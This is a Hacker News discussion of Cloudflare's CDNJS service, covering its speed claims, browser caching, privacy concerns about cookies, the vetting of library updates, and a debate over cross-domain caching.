
CDNJS: The Fastest Javascript Repo on the Web - spahl
http://blog.cloudflare.com/cdnjs-the-fastest-javascript-repo-on-the-web
======
jread
Low latency with a handful of pingdom monitoring nodes sitting in data centers
does not necessarily translate to the "fastest repo on the web". We've tested
CloudFlare since their launch using thousands of real users, and based on that
testing performance tends to be on the low end compared to traditional static
content CDNs. CloudFlare is more of a website proxy than CDN. By assuming full
control of your website DNS, it stands out more with add-on features like
security. Here is a link to some real user performance analysis I've compiled
for various CDNs including CloudFlare:
<http://dl.dropbox.com/u/20765204/feb12-cdn-report/index.html>

~~~
ksec
I have similar experience with CloudFlare. The Speed just isn't there. Most
CDN perform MUCH better then them. I would love to pay to even get faster
speed. But that is not the model they decided to work on. I hope they will
have more speed improvement coming in soon.

------
nikcub
this shouldn't be hosted on the cloudflare.com domain. since I am a customer
every request sends my cloudflare session cookie and a bunch of Google
Analytics cookies.

Not only is it 2.5KB of extra header info sent, but I don't think cloudflare
should know which websites their customers have been visiting.

~~~
graue
Yeah, that is an odd decision. Makes you wonder if the “secret” motive of
CloudFlare in hosting this, other than to promote their service, is to track
and analyze your visitors.

I don't see a privacy policy on CDNJS.com. I'd definitely like to know what
data they collect about my visitors and what they do with it.

At least the CDN doesn't itself _set_ any cookies.

~~~
atonse
If anything this would only work on other cloudflare users (like people who
logged in to cloudflare). Most users won't have any cookies on that domain.

~~~
bigiain
There's nothing to stop them setting cookies in the responses down the track
though. Wait until you've got enough users, then one day just switch on your
3rd party multi-site user tracking. Or perhaps less publicly dicoverable, use
browser fingerprinting and ip address correlation to do the same thing with
somewhat less accuracy, but completely invisibly.

And note too, that if you're relying on a 3rd party to serve javascript your
users are going to run in their browsers - if that 3rd party isn't
trustworthy, you're screwed in much worse ways that cookie tracking privacy
violations. Who'd notice if they started occasionally serving a modified
version of jQuery which sent all form field keydowns (aka, your usernames and
passwords) back to theselves?

~~~
atonse
Following the money will especially help in this situation.

How does CloudFlare make its money? It's a CDN company. I mean, that's the
CORE of what they do. What is jsCDN? It's a CDN.

A simpler theory is that hosting a Javascript CDN (and demonstrating that it's
even better than Google's, which is amazing), is going to provide a lot of
free advertising for their product. If I use their CDN for JS and it works
really well, I'm likely to go back to them for hosting other things, because
using jsCDN is almost like doing a free trial of their actual CDN.

It's not even like their main form of income is in another industry that we
have to make a cognitive leap to see what their ulterior motives are. It's
precisely this. CDNs.

------
eric_bullington
For analytics and tag generation of libraries hosted by CDNJS, take a look at:
<http://www.scriptselect.com> It's a weekend project I did a couple of weeks
ago using d3 and backbone. You can select libraries, view selected library
size, and copy the generated script tags for the libraries you've selected.
Just a little tool to make using CDNJS a little more convenient. If there's
enough demand, I'll add other CDNs.

Thanks to Ryan, Thomas, and CloudFlare for a very cool service!

------
IanDrake
Quick question... I thought the best part of CDN hosted js files was that they
were more likely already cached on the client, not so much for the speed of
delivery.

So, wouldn't it be better to go with the most popular and not the fastest?

~~~
graue
For jQuery, maybe. But if you're using, say, Backbone, that point is moot
because only CDNJS has it. The Google CDN[1] only hosts 11 libraries, CDNJS
hosts over 200.

1\. <https://developers.google.com/speed/libraries/devguide>

------
scosman
+1 to joshfraser - cache hits always beat requests. I remember seeing a stat
about n% of top 100 sites use the google CDN for jquery, it was by far the
most popular. Stick with Google for popular libraries.

------
moe
Backing up wild performance-claims with a _Pingdom chart_?

I really don't know how anyone can take CloudFlare seriously anymore...

------
po
They say this is 'peer-reviewed' but is that all? If someone sends them a pull
request for an update to a widely used but perhaps smaller library, will they
review it or does it just get merged into the CDN? It seems like a good way to
get access to millions of browser sessions. Is anyone in Cloudfare taking
responsibility for checking that the code is coming from the authoritative
repo and not joeblow/underscore.js?

<https://github.com/cdnjs/cdnjs#pull-requests-steps>

While Google and Microsoft are slower to update their libs, we can assume that
they are downloading releases from official sources.

~~~
thomasfromcdnjs
Contributors generally include the links to the official sources.

If not we track down the official repositories ourselves.

Once we have verified the source, we then check the diff against the submitted
and official. We have always flirted with the idea of a level of automation to
handle this. But your comment addresses the problem with a solution such as
that so we are still manually diff checking for maximum security.

------
joshfraser
The fastest request is the one that never happens. One of the biggest benefits
of using hosted libraries is that browsers cache those files locally. By
sharing the same URL for your copy of jQuery with thousands of other sites,
you increase your odds of getting a local browser cache hit. For popular
libraries like jQuery you're probably best using Google since they have the
most adoption. That said, I think CloudFlare's CDN is an interesting idea and
could grow into something genuinely useful especially for less popular
libraries.

------
daemon13
The question I have [but not the answer] is:

Usually in every project there is bunch of .js [jquery, backbone, etc] and
.css files. So the good practice is not only to minify and compress, but also
to bundle some/all of them into several big combined files to save on extra
HTTP calls.

So my question is - what is better - (1) have separate files served from such
CDN [or any public CDN] or (2) combine the files and serve yourself by
nginx/AWS?

Not a developer, feel free to correct any mistakes :-)

~~~
joshfraser
It's a great question. The answer depends on a lot of different variables like
your cache hit ratio, the size & number of files, etc. I'd recommend doing a
performance A/B test using JavaScript to time which one is best for your
particular site. We offer a free Real User Measurement tool at Torbit
(<http://torbit.com>) that includes the ability to do A/B tests like this.

------
cypherpunks01
cdnjs is a great public service, I've been using it for various projects for
awhile and it seems consistently fast everywhere.

------
atonse
I've recently started using CDNJS for my projects. Thanks to Ryan, Thomas, and
CloudFlare for this awesome service!

Even happier to see that you guys host CSS and images for the common libs. I
will change my bootstrap css hosting over to yours soon.

------
alexchamberlain
We can still improve this by caching across CDNs.

~~~
byoung2
You mean updating browsers to recognize the same file across different domains
(e.g. md5 hash, etc)?

~~~
alexchamberlain
I mean this... [http://alexchamberlain.co.uk/opinion/2012/09/13/cache-
across...](http://alexchamberlain.co.uk/opinion/2012/09/13/cache-across-
domains.html)

~~~
nikcub
the reason this hasn't been done is:

a) would require all servers and browsers to be updated for what is a marginal
gain

b) privacy nightmare

~~~
alexchamberlain
a) No it wouldn't; it would be totally optional. b) Get over it; there is no
difference between this and CDNs.

~~~
nikcub
> Get over it; there is no difference between this and CDNs.

except the part where you track people across sites

what I am saying is not speculative. this has been proposed previously, and
shot down. there is a reason why it hasn't happen.

~~~
alexchamberlain
Where would you be tracking people across sites?

~~~
nikcub
If you trawl through the IETF and more recently WHATWG mailing lists you will
find that every time caching comes up - either with Last-Modified or when ETag
was being ratified the proposal for cross-origin caching also comes up, and is
rejected.

The browser vendors just spent the past 4-5 years locking down cross-origin
access in the DOM because of all the security and privacy implications that
come up. Corporate profiles and ISO standards don't even accept running the
code - let alone caching it (i've worked on plenty of corporate projects where
you aren't allowed to even use Google hosted JS - it just won't run due to AD
policies).

To give you but one example of what arises with this new vector. Say I were to
go to the top 50 banking sites and take a sample of a Javascript file that is
unique to each site. I would then take the hash of each file, and in a single
web page include the script element with a hash of each of those files. When a
visitor hits that page and the browser attempts to load each script element,
if it loads it in 4ms then I know the file was in the cache and that the
visitor is a customer of that bank.

~~~
alexchamberlain
Why would the banks enable hashing on their unique stuff? It would be their
security flaw, not the design of the system.

~~~
nikcub
Well that is just one, and as I mentioned cross-origin requests and access
have been further locked down recently, not opened. With all the different
versions and variants of libraries you are implementing and exposing a lot to
save very little. You wouldn't even save 1% of web requests. as mentioned,
this isn't a new idea, I'm just telling you the reasons why it hasn't and
won't happen

------
0x006A
is the chrome extension[1] working? was just thinking that I might start to
use it if there was a browser extension that makes sure those requests stay
always local. otherwise its rather slow to use any remote resource while
developing a page locally.

<https://github.com/cdnjs/browser-extension>

